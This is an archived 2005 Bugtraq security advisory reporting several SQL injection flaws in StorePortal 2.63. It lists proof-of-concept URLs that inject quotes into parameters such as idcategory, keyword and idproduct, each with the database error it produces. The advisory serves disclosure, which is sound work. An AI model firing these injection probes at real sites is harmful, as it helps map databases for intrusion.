lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 24 Apr 2005 13:24:14 -0000 From: dcrab <dcrab@...kerscenter.com> To: bugtraq@...urityfocus.com Subject: Multiple SQL Injections in StorePortal 2.63 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Multiple SQL Injections in StorePortal 2.63 Date: 24/04/2005 Vendor: StorePortal Vendor Website: http://www.storeportal.com/ Summary: There are, multiple sql injections in storeportal 2.63. Proof of Concept Exploits: These sql injections are caused by the referrer, of these pages called, and are only exploitable if u visit them after visiting default.asp http://localhost/default.asp?language='sqlinjection SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?language='sqlinjection&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?id=1&opr=2&%3bpic='sql_injection_ SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?id=1&opr=2&pic='sql_injection_&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1 SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_ SQL INJECTION Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?mnu=&id=1&opr=5&content='sql_injection_ SQL INJECTION Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?mnu=&id=1&content='sql_injection_&opr=5&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?id=1&opr=4&keyword='sql_injection_ SQL INJECTION Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'IdCategoriaInfo = 1 and Visible = 'true' and '20050424' >= DataPubblicazione and (DataExpire <= ' 20050424' or DataExpire is null or DataExpire = '') and (Name like '%'sql_injection_%' or Body like '%'sql_injection_%')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_ SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
Powered by blists - more mailing lists